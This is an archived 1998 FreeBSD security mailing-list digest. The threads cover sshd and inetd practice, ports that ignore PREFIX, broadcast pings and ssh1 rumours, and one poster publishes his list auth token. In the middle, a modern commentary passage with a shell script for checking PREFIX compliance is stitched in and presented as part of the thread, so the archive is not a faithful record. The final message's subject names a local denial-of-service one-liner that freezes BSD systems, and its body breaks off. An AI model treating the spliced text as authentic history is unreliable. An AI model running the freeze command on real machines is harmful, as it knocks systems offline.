From owner-freebsd-security Mon Sep 14 13:06:06 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA06335 for freebsd-security-outgoing; Mon, 14 Sep 1998 13:06:06 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from trauco.colomsat.net.co (trauco.colomsat.net.co [200.13.195.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA06239 for ; Mon, 14 Sep 1998 13:05:59 -0700 (PDT) (envelope-from y-carden@uniandes.edu.co) Received: from [206.156.157.194] ([206.156.157.194]) by trauco.colomsat.net.co (8.8.8/8.8.8) with SMTP id PAA24216 for ; Mon, 14 Sep 1998 15:07:48 -0500 (GMT) Message-ID: <35FD78A1.19BB2797@uniandes.edu.co> Received: from OFC069 by [206.156.157.194] via smtpd (for trauco.colomsat.net.co [200.13.195.2]) with SMTP; 14 Sep 1997 20:07:25 UT Date: Mon, 14 Sep 1998 15:12:17 -0500
From: Yonny Cardenas Baron Organization: Panamco Indega S.A X-Mailer: Mozilla 4.05 [en] (Win95; I) MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: (no subject) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

auth 7c1689f4 unsubscribe freebsd-security y-carden@uniandes.edu.co

From owner-freebsd-security Mon Sep 14 13:21:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA09205 for freebsd-security-outgoing; Mon, 14 Sep 1998 13:21:53 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA09171; Mon, 14 Sep 1998 13:21:46 -0700 (PDT) (envelope-from archie@whistle.com) Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id NAA03427; Mon, 14 Sep 1998 13:21:22 -0700 (PDT) Received: from bubba.whistle.com(207.76.205.7) by whistle.com via smap (V1.3) id sma003422; Mon Sep 14 13:21:17 1998 Received: (from archie@localhost) by bubba.whistle.com (8.8.7/8.6.12) id NAA05491; Mon, 14 Sep 1998 13:21:17 -0700 (PDT)
From: Archie Cobbs Message-Id: <199809142021.NAA05491@bubba.whistle.com> Subject: Re: sshd In-Reply-To: <000201bde014$4f3e1b80$ca2aa8c0@ripley.tavari.muc.de> from Lutz Albers at "Sep 14, 98 09:17:26 pm" To: lutz@muc.de (Lutz Albers) Date: Mon, 14 Sep 1998 13:21:17 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG, ports@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Lutz Albers writes:
> > > A more frustrating problem for me are ports that are not
> > > ${PREFIX} != /usr/local compatible which makes it a hassle to
> > > install multiple version of a port or separate ports that have
> > > common files. Also, I occasionally go through phases of liking
> > > SysV way of installing things in /opt/,
> > > /etc/opt/ and /var/opt/ which a simple 'make
> > > PREFIX=/opt/' doesn't really accomplish.
> >
> > If someone was interested, it would be easy to write a script
> > that checks all the ports:
>
> (recipe for detecting misbehaving ports deleted)
>
> This will fail for X11 ports IMHO. The last time I checked they were
> installed into X11ROOT (/usr/X11R6).

OK.. so amend the recipe accordingly to allow for this. We could also add a "make check" target to bsd.port.mk that would check any individual port for problems.

-Archie

___________________________________________________________________________
Archie Cobbs * Whistle Communications, Inc.
* http://www.whistle.com

From owner-freebsd-security Mon Sep 14 13:50:01 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA14864 for freebsd-security-outgoing; Mon, 14 Sep 1998 13:50:01 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id NAA14825 for ; Mon, 14 Sep 1998 13:49:59 -0700 (PDT) (envelope-from sthaug@nethelp.no)
From: sthaug@nethelp.no Received: (qmail 7642 invoked by uid 1001); 14 Sep 1998 20:49:39 +0000 (GMT) To: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: Your message of "Mon, 14 Sep 1998 19:05:57 +0200" References: <4809.905792757@verdi.nethelp.no> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Mon, 14 Sep 1998 22:49:39 +0200 Message-ID: <7640.905806179@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

I had a question about this:

> For high security situations I recommend against using the
> standard inetd - better to use for instance Marcus Ranum's mini-inetd
> (79 lines) where you can more easily convince yourself that the code does
> what you want.

so in case anybody is interested, the original Usenet message from Marcus Ranum, with the whole 79 line inetd replacement, is available at

http://www.nethelp.no/net/inetd-mjr.txt

Steinar Haug, Nethelp consulting, sthaug@nethelp.no

From owner-freebsd-security Mon Sep 14 13:55:28 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA16287 for freebsd-security-outgoing; Mon, 14 Sep 1998 13:55:28 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dt053nb4.san.rr.com (dt053nb4.san.rr.com [204.210.34.180]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA16259 for ; Mon, 14 Sep 1998 13:55:23 -0700 (PDT) (envelope-from Studded@dal.net) Received: from dal.net (Studded@localhost [127.0.0.1]) by dt053nb4.san.rr.com (8.8.8/8.8.8) with ESMTP id NAA00778; Mon, 14 Sep 1998 13:55:05 -0700 (PDT) (envelope-from Studded@dal.net) Message-ID: <35FD82A8.84601D49@dal.net> Date: Mon, 14 Sep 1998 13:55:04 -0700
From: Studded Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.06 [en] (X11; I; FreeBSD 2.2.7-STABLE-0914 i386) MIME-Version: 1.0 To: Roger Marquis CC: freebsd-security@FreeBSD.ORG Subject: Re: sshd References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Roger Marquis wrote:
> The real issue, it seems to me, is consistency. If ftp, telnet, rsh,
> rlogin, etc. run from inetd then sshd should also.

Foolish consistency is the hobgoblin of small minds. I am also in the camp of those who disable inetd almost universally, and run sshd standalone. Since I don't think either camp is going to convince the other, perhaps we should let this drop?

Doug

--
*** Chief Operations Officer, DALnet IRC network ***

"Yes, the president should resign. He has lied to the American people, time and time again, and betrayed their trust. He is no longer an effective leader. Since he has admitted guilt, there is no reason to put the American people through an impeachment. He will serve absolutely no purpose in finishing out his term; the only possible solution is for the president to save some dignity and resign."
- William Jefferson Clinton, 1974

From owner-freebsd-security Mon Sep 14 14:10:27 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA21116 for freebsd-security-outgoing; Mon, 14 Sep 1998 14:10:27 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from whorfin.sjca.edu (whorfin.sjca.edu [199.89.180.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA20967 for ; Mon, 14 Sep 1998 14:10:00 -0700 (PDT) (envelope-from j-emmons@sjca.edu) Received: from localhost (skia@localhost) by whorfin.sjca.edu (8.8.7/8.8.5) with SMTP id RAA26684 for ; Mon, 14 Sep 1998 17:08:57 -0400 (EDT) Date: Mon, 14 Sep 1998 17:08:57 -0400 (EDT)
From: "Josh Emmons (skia)" To: freebsd-security@FreeBSD.ORG Subject: Re: (no subject) In-Reply-To: <35FD78A1.19BB2797@uniandes.edu.co> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

> auth 7c1689f4 unsubscribe freebsd-security y-carden@uniandes.edu.co
       ^^^^^^^^

And this is posted on security... heh heh heh...

Josh Emmons...j-emmons@sjca.edu
``...great feelings will often take the aspect of error, and great faith the aspect of illusion.'' - George Eliot

From owner-freebsd-security Mon Sep 14 15:17:49 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA04092 for freebsd-security-outgoing; Mon, 14 Sep 1998 15:17:49 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from roble.com (roble.com [207.5.40.50]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA04070; Mon, 14 Sep 1998 15:17:46 -0700 (PDT) (envelope-from sendmail@roble.com) Received: from localhost (localhost [127.0.0.1]) by roble.com (Roble) with SMTP id PAA28919; Mon, 14 Sep 1998 15:17:28 -0700 (PDT) Date: Mon, 14 Sep 1998 15:17:28 -0700 (PDT)
From: Roger Marquis To: freebsd-security@FreeBSD.ORG, ports@FreeBSD.ORG Subject: Re: sshd In-Reply-To: <199809142021.NAA05491@bubba.whistle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Mon, 14 Sep 1998, Archie Cobbs wrote:
> We could also add a "make check" target to bsd.port.mk that would
> check any individual port for problems.

That would certainly qualify as good Quality Assurance, especially if it were done before each release and the non-compliant ports were fixed or eliminated.

Roger Marquis
Roble Systems Consulting
http://www.roble.com/

From owner-freebsd-security Mon Sep 14 15:30:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA07059 for freebsd-security-outgoing; Mon, 14 Sep 1998 15:30:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from orbital.tiora.net (cx31658-a.escnd1.sdca.home.com [24.0.185.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA07051 for ; Mon, 14 Sep 1998 15:30:19 -0700 (PDT) (envelope-from liam@orbital.tiora.net) Received: from localhost (liam@localhost) by orbital.tiora.net (8.9.1a/8.9.1a+rbl+antispam+zol_hack) with SMTP id PAA07061; Mon, 14 Sep 1998 15:10:38 -0700 (PDT) Date: Mon, 14 Sep 1998 15:10:38 -0700 (PDT)
From: Liam Slusser To: ben@rosengart.com cc: security@FreeBSD.ORG Subject: Re: smurf and broadcast packets.. In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

I checked my internal network..the netmask is 255.255.255.0 and the broadcast is 10.0.0.255. ;)

liam

System Administrator Tiora Networks | www.tiora.net <---- tiora's webpage
www.tiora.net/~liam <----- homepage | liam@tiora.net <-- my email address
Lowered turbo powered Honda Civic's are really cool. <---------- my quote

On Mon, 14 Sep 1998, Snob Art Genre wrote:
> On Mon, 14 Sep 1998, Liam Slusser wrote:
>
> > changed it to 0, and from there...i ran into a weird
> > problem. My server has two network cards in it, ed0 (internet side,
> > 24.0.185.89) and ed1 (internal network, 10.0.0.1), and runs natd. When i
> > turned net.inet.icmp.bmcastecho to 0..i could not ping 10.0.0.255 but i
> > could ping my internet side 24.0.189.255.
>
> Not so weird. The broadcast address on your internal network is
> probably 10.255.255.255.
>
>
> Ben
>
> "You have your mind on computers, it seems."
From owner-freebsd-security Mon Sep 14 17:43:12 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA29171 for freebsd-security-outgoing; Mon, 14 Sep 1998 17:43:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from kendra.ne.mediaone.net (kendra.ne.mediaone.net [24.128.94.182]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA29162 for ; Mon, 14 Sep 1998 17:43:09 -0700 (PDT) (envelope-from software@kew.com) Received: from sonata.hh.kew.com (root@sonata-dmz.hh.kew.com [192.168.205.1]) by kendra.ne.mediaone.net (8.9.1/8.9.1) with ESMTP id UAA03957; Mon, 14 Sep 1998 20:42:51 -0400 (EDT) Received: from ffactory.uucp.kew.com (ffactory.hh.kew.com [192.168.203.131]) by sonata.hh.kew.com (8.9.1/8.9.1) with SMTP id UAA06287; Mon, 14 Sep 1998 20:42:49 -0400 (EDT) Received: from kew.com by ffactory.uucp.kew.com (UUPC/extended 1.13d) with UUCP for multiple addressees; Mon, 14 Sep 1998 20:42:49 -0500 Received: from kew.com by ffactory.uucp.kew.com (UUPC/extended 1.13d) with ESMTP for multiple addresses; Mon, 14 Sep 1998 20:42:46 -0500 Message-ID: <35FDB805.D2F16703@kew.com> Date: Mon, 14 Sep 1998 20:42:45 -0400
From: Drew Derbyshire Organization: Kendra Electronic Wonderworks, Stoneham, MA 02180 (http://www.kew.com) X-Mailer: Mozilla 4.05 [en] (WinNT; U) MIME-Version: 1.0 To: Roger Marquis Subject: Re: sshd References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Roger Marquis wrote:
> The real issue, it seems to me, is consistency. If ftp, telnet, rsh,
> rlogin, etc. run from inetd then sshd should also. The original reason it
> wasn't is the key generation delay, which isn't an issue on anything
> faster than a 486/25.

It's still an issue (10+ seconds) on a 486/66, which loafs otherwise as my outer firewall. Pentiums, perhaps.

In any case, I find if it works properly as the port installs it, I use the default.

-ahd-

--
Drew Derbyshire UUPC/extended e-mail: software@kew.com Telephone: 617-279-9812
"I'm only human, flesh and blood, a man. Human, born to make mistakes . . ."

From owner-freebsd-security Mon Sep 14 18:12:10 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA02389 for freebsd-security-outgoing; Mon, 14 Sep 1998 18:12:10 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from roble.com (roble.com [207.5.40.50]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA02379 for ; Mon, 14 Sep 1998 18:12:06 -0700 (PDT) (envelope-from sendmail@roble.com) Received: from localhost (localhost [127.0.0.1]) by roble.com (Roble) with SMTP id SAA29862 for ; Mon, 14 Sep 1998 18:11:45 -0700 (PDT) Date: Mon, 14 Sep 1998 18:11:45 -0700 (PDT)
From: Roger Marquis To: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: <35FD82A8.84601D49@dal.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Mon, 14 Sep 1998, Studded wrote:
> Foolish consistency is the hobgoblin of small minds. I am also in the
> camp of those who disable inetd almost universally, and run sshd
> standalone. Since I don't think either camp is going to convince the
> other, perhaps we should let this drop?

Au contraire, consistency is fundamental to good systems administration. KISS and consistency are what keeps the Macintosh alive despite all odds. KISS, consistency and efficiency are what keeps sites with dozens or hundreds of Unix boxes running with high uptime and a small staff.

If you don't need inetd then it's probably a good idea to disable it and run all your daemons all the time however most hosts, including firewalls, do use it. Is there a significant security (or other) reason to disable it?
Roger Marquis
Roble Systems Consulting
http://www.roble.com/

From owner-freebsd-security Mon Sep 14 18:27:40 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA04443 for freebsd-security-outgoing; Mon, 14 Sep 1998 18:27:40 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from relay.nuxi.com (nuxi.cs.ucdavis.edu [128.120.56.38]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA04438; Mon, 14 Sep 1998 18:27:39 -0700 (PDT) (envelope-from obrien@dragon.nuxi.com) Received: from dragon.nuxi.com (d96-072.orchard2.ucdavis.edu [169.237.96.72]) by relay.nuxi.com (8.8.8/8.6.12) with ESMTP id SAA13038; Mon, 14 Sep 1998 18:27:24 -0700 (PDT) Received: (from obrien@localhost) by dragon.nuxi.com (8.8.8/8.8.8) id BAA17760; Tue, 15 Sep 1998 01:27:17 GMT (envelope-from obrien) Message-ID: <19980914182717.A17745@nuxi.com> Date: Mon, 14 Sep 1998 18:27:17 -0700
From: "David O'Brien" To: David Gilbert , John Fieber Cc: Roger Marquis , freebsd-security@FreeBSD.ORG, ports@FreeBSD.ORG Subject: Re: sshd Reply-To: obrien@NUXI.com References: <199809140152.VAA28566@trooper.velocet.ca> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <199809140152.VAA28566@trooper.velocet.ca>; from David Gilbert on Sun, Sep 13, 1998 at 09:52:10PM -0400 X-Operating-System: FreeBSD 3.0-19980804-SNAP Organization: The NUXI BSD group X-PGP-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Keyid: 34F9F9D5 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

> heard complaints in our shop is that we can't really use /usr/local
> for local things anymore because ports live there --- and we desire
> the ability to blow away easily recreated ports while retaining hand
> built extras.

That's why I had to create /usr/treats on all my machines. :(

--
-- David (obrien@NUXI.com -or- obrien@FreeBSD.org)

From owner-freebsd-security Mon Sep 14 19:00:33 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA09308 for freebsd-security-outgoing; Mon, 14 Sep 1998 19:00:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from colin.muc.de (colin.muc.de [193.174.4.1]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id TAA09274; Mon, 14 Sep 1998 19:00:21 -0700 (PDT) (envelope-from lutz@muc.de) Received: from tavari.muc.de ([193.174.4.22]) by colin.muc.de with SMTP id <140559-3>; Mon, 14 Sep 1998 22:17:14 +0200 Received: (from daemon@localhost) by tavari.muc.de (8.8.8/8.8.7) id VAA12104; Mon, 14 Sep 1998 21:17:42 +0200 (CEST) Received: from ripley(192.168.42.202) by morranon via smap (V2.1) id xma012102; Mon, 14 Sep 98 21:17:29 +0200
From: "Lutz Albers" To: "Archie Cobbs" , "John Fieber" Cc: , , Subject: RE: sshd Date: Mon, 14 Sep 1998 21:17:26 +0200 Message-ID: <000201bde014$4f3e1b80$ca2aa8c0@ripley.tavari.muc.de> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 In-reply-to: <199809140706.AAA16521@bubba.whistle.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

> > A more frustrating problem for me are ports that are not
> > ${PREFIX} != /usr/local compatible which makes it a hassle to
> > install multiple version of a port or separate ports that have
> > common files. Also, I occasionally go through phases of liking
> > SysV way of installing things in /opt/,
> > /etc/opt/ and /var/opt/ which a simple 'make
> > PREFIX=/opt/' doesn't really accomplish.
>
> If someone was interested, it would be easy to write a script
> that checks all the ports:

(recipe for detecting misbehaving ports deleted)

This will fail for X11 ports IMHO. The last time I checked they were installed into X11ROOT (/usr/X11R6).

--
Lutz Albers, lutz@muc.de, pgp key available from
Do not take life too seriously, you will never get out of it alive.
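Archie and Lutz above discuss a script that checks ports for PREFIX compliance (the actual recipe was deleted from the quoted message) and Lutz's point that X11 ports legitimately install under /usr/X11R6. The script below is an added example written for this thread; it is neither the deleted recipe nor anything from bsd.port.mk, and the `check_prefix` function, its file-list argument and the constructed sample install are all my own. It takes a PREFIX and a list of installed paths (one per line, as you would get from a pkg-plist) and reports two classes of misbehaviour: files that landed outside PREFIX or the X11 tree, and files that still carry a hardcoded /usr/local even though the port was installed elsewhere.

```shell
#!/bin/sh
# Added example: a PREFIX-compliance check for an installed port, in the
# spirit of the "make check" target Archie proposes. Not the deleted recipe,
# not part of bsd.port.mk. Usage: check_prefix PREFIX FILELIST, where
# FILELIST holds one installed path per line.

X11BASE=${X11BASE:-/usr/X11R6}   # X11 ports legitimately install here

check_prefix() {
    prefix=$1
    list=$2
    rc=0
    while IFS= read -r f; do
        [ -n "$f" ] || continue
        case $f in
            "$prefix"/*|"$X11BASE"/*) ;;            # inside a sanctioned tree
            *) echo "outside PREFIX: $f"; rc=1 ;;
        esac
        # A file that still mentions /usr/local was built with the default
        # baked in and will break as soon as PREFIX moves.
        if [ "$prefix" != /usr/local ] && [ -f "$f" ] \
           && grep -q '/usr/local' "$f" 2>/dev/null; then
            echo "hardcoded /usr/local in: $f"; rc=1
        fi
    done <<EOF
$list
EOF
    return $rc
}

# Constructed sample install (hypothetical port "foo"): one clean wrapper,
# one with /usr/local baked in, and one library that landed outside PREFIX.
build_sample() {
    dir=$(mktemp -d) || return 1
    mkdir -p "$dir/opt/bin" "$dir/usr/local/lib"
    printf '#!/bin/sh\nexec %s/libexec/foo "$@"\n' "$dir/opt" > "$dir/opt/bin/good"
    printf '#!/bin/sh\nexec /usr/local/libexec/foo "$@"\n' > "$dir/opt/bin/bad"
    : > "$dir/usr/local/lib/libfoo.so"
    echo "$dir"
}

# The file list a pkg-plist would have recorded for the sample install.
sample_filelist() {
    printf '%s/opt/bin/good\n%s/opt/bin/bad\n%s/usr/local/lib/libfoo.so\n' "$1" "$1" "$1"
}

# Stand-alone demo: report on the constructed sample, then clean up.
d=$(build_sample)
check_prefix "$d/opt" "$(sample_filelist "$d")" || echo "sample port does not honour PREFIX"
rm -rf "$d"
```

The grep for a literal /usr/local is deliberately crude: it catches the common case (a wrapper script or config file with the build-time default baked in) and is cheap enough to run over every installed file of every port before a release, which is the QA step Roger asks for further down the thread.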
From owner-freebsd-security Mon Sep 14 22:13:05 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA27330 for freebsd-security-outgoing; Mon, 14 Sep 1998 22:13:05 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gjp.erols.com (alex-va-n008c079.moon.jic.com [206.156.18.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA27325 for ; Mon, 14 Sep 1998 22:13:01 -0700 (PDT) (envelope-from gjp@gjp.erols.com) Received: from gjp.erols.com (gjp@localhost.erols.com [127.0.0.1]) by gjp.erols.com (8.8.8/8.8.7) with ESMTP id BAA08116; Tue, 15 Sep 1998 01:12:35 -0400 (EDT) (envelope-from gjp@gjp.erols.com) X-Mailer: exmh version 2.0.1 12/23/97 To: Michael Maxwell cc: freebsd-security@FreeBSD.ORG
From: "Gary Palmer" Subject: Re: innd 1.7.2 issues... In-reply-to: Your message of "Mon, 14 Sep 1998 12:42:39 CDT." <19980914124239.A5031@drwho.xnet.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 15 Sep 1998 01:12:35 -0400 Message-ID: <8112.905836355@gjp.erols.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Michael Maxwell wrote in message ID <19980914124239.A5031@drwho.xnet.com>:
> Ok, this would make sense as I recognized one of the connections being from
> a known spam domain (club-internet.fr) whom I've dealt with regarding their
> spamming in the past. I just found it interesting that this has only just
> started to occur.

Check www.freenix.fr/top1000 to see if your server recently appeared...

Gary

--
Gary Palmer FreeBSD Core Team Member
FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info

From owner-freebsd-security Mon Sep 14 23:10:02 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA03760 for freebsd-security-outgoing; Mon, 14 Sep 1998 23:10:02 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from leaf.lumiere.net (leaf.lumiere.net [207.218.152.15]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA03709 for ; Mon, 14 Sep 1998 23:09:59 -0700 (PDT) (envelope-from j@leaf.lumiere.net) Received: (from j@localhost) by leaf.lumiere.net (8.9.1/8.9.1) id XAA06950; Mon, 14 Sep 1998 23:09:49 -0700 (PDT) Date: Mon, 14 Sep 1998 23:09:49 -0700 (PDT)
From: Jesse To: freebsd-security@FreeBSD.ORG Subject: sshd1 safety? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Hi, I've recently been hearing about issues with the latest (and final) version of ssh1 that theoretically might allow remote root (or lesser) exploits. Is anyone aware of such issues? I did searches on various sites such as rootshell, but didn't find any major exploits. I'm hoping this is a false rumor, since according to the new licensing in the ssh2 releases, I can't run ssh2. (sigh, I much prefer the ssh1 license). On a side note, anyone know of any good, secure alternatives to ssh? Thanks!

--- Jesse http://www.lumiere.net/

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 23:25:48 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA05290 for freebsd-security-outgoing; Mon, 14 Sep 1998 23:25:48 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from peak.mountin.net ([207.227.119.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA05285 for ; Mon, 14 Sep 1998 23:25:46 -0700 (PDT) (envelope-from jeff-ml@mountin.net) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id BAA03443; Tue, 15 Sep 1998 01:25:28 -0500 (CDT) Received: from aridius-81.isdn.mke.execpc.com(169.207.66.208) by peak.mountin.net via smap (V1.3) id sma003441; Tue Sep 15 01:25:25 1998 Message-Id: <3.0.3.32.19980915012359.006dae0c@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.3 (32) Date: Tue, 15 Sep 1998 01:23:59 -0500 To: Roger Marquis , freebsd-security@FreeBSD.ORG
From: "Jeffrey J. Mountin" Subject: Re: sshd In-Reply-To: References: <35FD82A8.84601D49@dal.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

At 06:11 PM 9/14/98 -0700, Roger Marquis wrote:
>On Mon, 14 Sep 1998, Studded wrote:
>> Foolish consistency is the hobgoblin of small minds. I am also in the
>> camp of those who disable inetd almost universally, and run sshd
>> standalone. Since I don't think either camp is going to convince the
>> other, perhaps we should let this drop?
>
>Au contraire, consistency is fundamental to good systems
>administration. KISS and consistency are what keeps the Macintosh
>alive despite all odds. KISS, consistency and efficiency are what
>keeps sites with dozens or hundreds of Unix boxes running with high
>uptime and a small staff.

KISS may apply to the server config, but it can get a bit complex to set things up. ;)

>If you don't need inetd then it's probably a good idea to disable it
>and run all your daemons all the time however most hosts, including
>firewalls, do use it. Is there a significant security (or other)
>reason to disable it?

One problem is if you want to run tcp wrappers, then some services should be inetd. And need we get into certain daemons that we shouldn't run directly. I'd say use inetd for certain daemons and use wrappers.

telnet
ftp
pop3
finger
ntalk

The last 2 only work locally and between specific machines. For only DNS servers I've only run sshd, no inetd, no sendmail, and no remote logging.

Since we've somewhat digressed, changing portmap in rc.conf to "NO" would also be in order and unless a server needs to handle incoming mail, it should not run as a daemon.

Different servers, different needs, and different security policies.
Jeff Mountin - Unix Systems TCP/IP networking jeff@mountin.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 15 03:52:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA09070 for freebsd-security-outgoing; Tue, 15 Sep 1998 03:52:58 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA09064 for ; Tue, 15 Sep 1998 03:52:55 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id LAA24610 for ; Tue, 15 Sep 1998 11:52:36 +0100 (BST) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by bofh.fast.net.uk (8.9.1/8.8.8) with SMTP id LAA00407 for ; Tue, 15 Sep 1998 11:52:36 +0100 (BST) (envelope-from netadmin@fastnet.co.uk) Date: Tue, 15 Sep 1998 11:52:36 +0100 (BST) 
From: Jay Tribick X-Sender: netadmin@bofh.fast.net.uk To: security@FreeBSD.ORG Subject: grep ohdear /dev/zero in a tight loop freezes FreeBSD && OpenBSD Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Background
----------
FreeBSD bofh.fast.net.uk 2.2.6-RELEASE FreeBSD 2.2.6-RELEASE #0 root@bofh.fast.net.uk:/usr/src/sys/compile/GENERIC i386

login.conf (ulimit) restrictions:

lockd:\
        :priority=20:\
        :openfiles=32:\
        :openfiles-cur=32:\
        :memoryuse-cur=10M:\
        :maxproc-cur=32:\
        :cputime=1h:\
